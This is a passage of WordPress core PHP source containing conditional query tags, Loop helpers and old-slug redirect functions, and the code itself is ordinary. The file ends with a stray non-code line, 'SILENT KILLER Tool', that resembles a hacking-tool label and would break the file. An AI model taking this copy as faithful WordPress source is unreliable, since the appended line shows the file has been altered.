		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_month();
}

/**
 * Determines whether the query is for an existing single page.
 *
 * If the $page parameter is specified, this function will additionally
 * check if the query is for one of the pages specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @see is_single()
 * @see is_singular()
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param int|string|int[]|string[] $page Optional. Page ID, title, slug, or array of such
 *                                        to check against. Default empty.
 * @return bool Whether the query is for an existing single page.
 */
function is_page( $page = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_page( $page );
}

/**
 * Determines whether the query is for a paged result and not for the first page.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for a paged result.
 */
function is_paged() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_paged();
}

/**
 * Determines whether the query is for a post or page preview.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.0.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for a post or page preview.
 */
function is_preview() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_preview();
}

/**
 * Is the query for the robots.txt file?
 *
 * @since 2.1.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for the robots.txt file.
 */
function is_robots() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_robots();
}

/**
 * Is the query for the favicon.ico file?
 *
 * @since 5.4.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for the favicon.ico file.
 */
function is_favicon() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_favicon();
}

/**
 * Determines whether the query is for a search.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for a search.
 */
function is_search() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_search();
}

/**
 * Determines whether the query is for an existing single post.
 *
 * Works for any post type, except attachments and pages
 *
 * If the $post parameter is specified, this function will additionally
 * check if the query is for one of the Posts specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @see is_page()
 * @see is_singular()
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param int|string|int[]|string[] $post Optional. Post ID, title, slug, or array of such
 *                                        to check against. Default empty.
 * @return bool Whether the query is for an existing single post.
 */
function is_single( $post = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_single( $post );
}

/**
 * Determines whether the query is for an existing single post of any post type
 * (post, attachment, page, custom post types).
 *
 * If the $post_types parameter is specified, this function will additionally
 * check if the query is for one of the Posts Types specified.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @see is_page()
 * @see is_single()
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param string|string[] $post_types Optional. Post type or array of post types
 *                                    to check against. Default empty.
 * @return bool Whether the query is for an existing single post
 *              or any of the given post types.
 */
function is_singular( $post_types = '' ) {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_singular( $post_types );
}

/**
 * Determines whether the query is for a specific time.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for a specific time.
 */
function is_time() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_time();
}

/**
 * Determines whether the query is for a trackback endpoint call.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for a trackback endpoint call.
 */
function is_trackback() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_trackback();
}

/**
 * Determines whether the query is for an existing year archive.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for an existing year archive.
 */
function is_year() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_year();
}

/**
 * Determines whether the query has resulted in a 404 (returns no results).
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is a 404 error.
 */
function is_404() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_404();
}

/**
 * Is the query for an embedded post?
 *
 * @since 4.4.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is for an embedded post.
 */
function is_embed() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '3.1.0' );
		return false;
	}

	return $wp_query->is_embed();
}

/**
 * Determines whether the query is the main query.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 3.3.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool Whether the query is the main query.
 */
function is_main_query() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		_doing_it_wrong( __FUNCTION__, __( 'Conditional query tags do not work before the query is run. Before then, they always return false.' ), '6.1.0' );
		return false;
	}

	if ( 'pre_get_posts' === current_filter() ) {
		_doing_it_wrong(
			__FUNCTION__,
			sprintf(
				/* translators: 1: pre_get_posts, 2: WP_Query->is_main_query(), 3: is_main_query(), 4: Documentation URL. */
				__( 'In %1$s, use the %2$s method, not the %3$s function. See %4$s.' ),
				'<code>pre_get_posts</code>',
				'<code>WP_Query->is_main_query()</code>',
				'<code>is_main_query()</code>',
				__( 'https://developer.wordpress.org/reference/functions/is_main_query/' )
			),
			'3.7.0'
		);
	}

	return $wp_query->is_main_query();
}

/*
 * The Loop. Post loop control.
 */

/**
 * Determines whether current WordPress query has posts to loop over.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool True if posts are available, false if end of the loop.
 */
function have_posts() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		return false;
	}

	return $wp_query->have_posts();
}

/**
 * Determines whether the caller is in the Loop.
 *
 * For more information on this and similar theme functions, check out
 * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
 * Conditional Tags} article in the Theme Developer Handbook.
 *
 * @since 2.0.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool True if caller is within loop, false if loop hasn't started or ended.
 */
function in_the_loop() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		return false;
	}

	return $wp_query->in_the_loop;
}

/**
 * Rewind the loop posts.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 */
function rewind_posts() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		return;
	}

	$wp_query->rewind_posts();
}

/**
 * Iterate the post index in the loop.
 *
 * @since 1.5.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 */
function the_post() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		return;
	}

	$wp_query->the_post();
}

/*
 * Comments loop.
 */

/**
 * Determines whether current WordPress query has comments to loop over.
 *
 * @since 2.2.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @return bool True if comments are available, false if no more comments.
 */
function have_comments() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		return false;
	}

	return $wp_query->have_comments();
}

/**
 * Iterate comment index in the comment loop.
 *
 * @since 2.2.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 */
function the_comment() {
	global $wp_query;

	if ( ! isset( $wp_query ) ) {
		return;
	}

	$wp_query->the_comment();
}

/**
 * Redirect old slugs to the correct permalink.
 *
 * Attempts to find the current slug from the past slugs.
 *
 * @since 2.1.0
 */
function wp_old_slug_redirect() {
	if ( is_404() && '' !== get_query_var( 'name' ) ) {
		// Guess the current post type based on the query vars.
		if ( get_query_var( 'post_type' ) ) {
			$post_type = get_query_var( 'post_type' );
		} elseif ( get_query_var( 'attachment' ) ) {
			$post_type = 'attachment';
		} elseif ( get_query_var( 'pagename' ) ) {
			$post_type = 'page';
		} else {
			$post_type = 'post';
		}

		if ( is_array( $post_type ) ) {
			if ( count( $post_type ) > 1 ) {
				return;
			}
			$post_type = reset( $post_type );
		}

		// Do not attempt redirect for hierarchical post types.
		if ( is_post_type_hierarchical( $post_type ) ) {
			return;
		}

		$id = _find_post_by_old_slug( $post_type );

		if ( ! $id ) {
			$id = _find_post_by_old_date( $post_type );
		}

		/**
		 * Filters the old slug redirect post ID.
		 *
		 * @since 4.9.3
		 *
		 * @param int $id The redirect post ID.
		 */
		$id = apply_filters( 'old_slug_redirect_post_id', $id );

		if ( ! $id ) {
			return;
		}

		$link = get_permalink( $id );

		if ( get_query_var( 'paged' ) > 1 ) {
			$link = user_trailingslashit( trailingslashit( $link ) . 'page/' . get_query_var( 'paged' ) );
		} elseif ( is_embed() ) {
			$link = user_trailingslashit( trailingslashit( $link ) . 'embed' );
		}

		/**
		 * Filters the old slug redirect URL.
		 *
		 * @since 4.4.0
		 *
		 * @param string $link The redirect URL.
		 */
		$link = apply_filters( 'old_slug_redirect_url', $link );

		if ( ! $link ) {
			return;
		}

		wp_redirect( $link, 301 ); // Permanent redirect.
		exit;
	}
}

/**
 * Find the post ID for redirecting an old slug.
 *
 * @since 4.9.3
 * @access private
 *
 * @see wp_old_slug_redirect()
 * @global wpdb $wpdb WordPress database abstraction object.
 *
 * @param string $post_type The current post type based on the query vars.
 * @return int The Post ID.
 */
function _find_post_by_old_slug( $post_type ) {
	global $wpdb;

	$query = $wpdb->prepare( "SELECT post_id FROM $wpdb->postmeta, $wpdb->posts WHERE ID = post_id AND post_type = %s AND meta_key = '_wp_old_slug' AND meta_value = %s", $post_type, get_query_var( 'name' ) );

	/*
	 * If year, monthnum, or day have been specified, make our query more precise
	 * just in case there are multiple identical _wp_old_slug values.
	 */
	if ( get_query_var( 'year' ) ) {
		$query .= $wpdb->prepare( ' AND YEAR(post_date) = %d', get_query_var( 'year' ) );
	}
	if ( get_query_var( 'monthnum' ) ) {
		$query .= $wpdb->prepare( ' AND MONTH(post_date) = %d', get_query_var( 'monthnum' ) );
	}
	if ( get_query_var( 'day' ) ) {
		$query .= $wpdb->prepare( ' AND DAYOFMONTH(post_date) = %d', get_query_var( 'day' ) );
	}

	$key          = md5( $query );
	$last_changed = wp_cache_get_last_changed( 'posts' );
	$cache_key    = "find_post_by_old_slug:$key:$last_changed";
	$cache        = wp_cache_get( $cache_key, 'post-queries' );
	if ( false !== $cache ) {
		$id = $cache;
	} else {
		$id = (int) $wpdb->get_var( $query );
		wp_cache_set( $cache_key, $id, 'post-queries' );
	}

	return $id;
}

/**
 * Find the post ID for redirecting an old date.
 *
 * @since 4.9.3
 * @access private
 *
 * @see wp_old_slug_redirect()
 * @global wpdb $wpdb WordPress database abstraction object.
 *
 * @param string $post_type The current post type based on the query vars.
 * @return int The Post ID.
 */
function _find_post_by_old_date( $post_type ) {
	global $wpdb;

	$date_query = '';
	if ( get_query_var( 'year' ) ) {
		$date_query .= $wpdb->prepare( ' AND YEAR(pm_date.meta_value) = %d', get_query_var( 'year' ) );
	}
	if ( get_query_var( 'monthnum' ) ) {
		$date_query .= $wpdb->prepare( ' AND MONTH(pm_date.meta_value) = %d', get_query_var( 'monthnum' ) );
	}
	if ( get_query_var( 'day' ) ) {
		$date_query .= $wpdb->prepare( ' AND DAYOFMONTH(pm_date.meta_value) = %d', get_query_var( 'day' ) );
	}

	$id = 0;
	if ( $date_query ) {
		$query        = $wpdb->prepare( "SELECT post_id FROM $wpdb->postmeta AS pm_date, $wpdb->posts WHERE ID = post_id AND post_type = %s AND meta_key = '_wp_old_date' AND post_name = %s" . $date_query, $post_type, get_query_var( 'name' ) );
		$key          = md5( $query );
		$last_changed = wp_cache_get_last_changed( 'posts' );
		$cache_key    = "find_post_by_old_date:$key:$last_changed";
		$cache        = wp_cache_get( $cache_key, 'post-queries' );
		if ( false !== $cache ) {
			$id = $cache;
		} else {
			$id = (int) $wpdb->get_var( $query );
			if ( ! $id ) {
				// Check to see if an old slug matches the old date.
				$id = (int) $wpdb->get_var( $wpdb->prepare( "SELECT ID FROM $wpdb->posts, $wpdb->postmeta AS pm_slug, $wpdb->postmeta AS pm_date WHERE ID = pm_slug.post_id AND ID = pm_date.post_id AND post_type = %s AND pm_slug.meta_key = '_wp_old_slug' AND pm_slug.meta_value = %s AND pm_date.meta_key = '_wp_old_date'" . $date_query, $post_type, get_query_var( 'name' ) ) );
			}
			wp_cache_set( $cache_key, $id, 'post-queries' );
		}
	}

	return $id;
}

/**
 * Set up global post data.
 *
 * @since 1.5.0
 * @since 4.4.0 Added the ability to pass a post ID to `$post`.
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param WP_Post|object|int $post WP_Post instance or Post ID/object.
 * @return bool True when finished.
 */
function setup_postdata( $post ) {
	global $wp_query;

	if ( ! empty( $wp_query ) && $wp_query instanceof WP_Query ) {
		return $wp_query->setup_postdata( $post );
	}

	return false;
}

/**
 * Generates post data.
 *
 * @since 5.2.0
 *
 * @global WP_Query $wp_query WordPress Query object.
 *
 * @param WP_Post|object|int $post WP_Post instance or Post ID/object.
 * @return array|false Elements of post, or false on failure.
 */
function generate_postdata( $post ) {
	global $wp_query;

	if ( ! empty( $wp_query ) && $wp_query instanceof WP_Query ) {
		return $wp_query->generate_postdata( $post );
	}

	return false;
}

SILENT KILLER Tool